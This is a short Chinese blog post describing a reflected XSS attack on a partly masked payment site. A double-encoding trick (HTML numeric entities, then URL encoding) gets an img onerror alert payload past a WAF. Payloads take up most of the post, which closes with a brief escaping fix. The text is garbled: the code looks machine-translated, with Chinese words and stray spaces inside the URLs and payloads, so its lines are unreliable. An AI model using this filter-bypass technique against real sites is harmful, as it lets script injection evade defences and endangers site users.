BYPASS waf 之XSS

今日测站,新学习了花式绕过XSS,特记录便于学习

绕过WAF通用型漏洞反射型跨站

WAF仅针对URL编码进行了解码过滤,没有检测的统一编码,导致可以通过二次转码绕过WAF的检测。

有效载荷:HTTPS:// paypre -s ** dc ********。com / app / recharge / gateway / queryReturnAmt.do回调= <IMG SRC + = X +的onerror + =“%26% 230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108% 26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041“ >

普通标签XSS

HTTPS:// paypre -s ** dc ********。com / app / recharge / gateway / queryReturnAmt.do回调= <IMG SRC + = X +的onerror + =“JavaScript的:警报(’ XSS’)“>

先进行URL编码

HTTPS:// paypre -s ** dc ********。com / app / recharge / gateway / queryReturnAmt.do回调= <IMG SRC + = X +的onerror + =“&#0000106&#0000097&# 0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041“>

再统一的转换

HTTPS:// paypre -s ** dc ********。com / app / recharge / gateway / queryReturnAmt.do回调= <IMG SRC + = X +的onerror + =“%26%230000106%26 %230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101 %26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041“ >

修复建议:
对前端用户可控参数进行html实体化转义

 

本博主佛系人生,自娱自乐,不喜勿喷。

Leave a Reply

Your email address will not be published. Required fields are marked *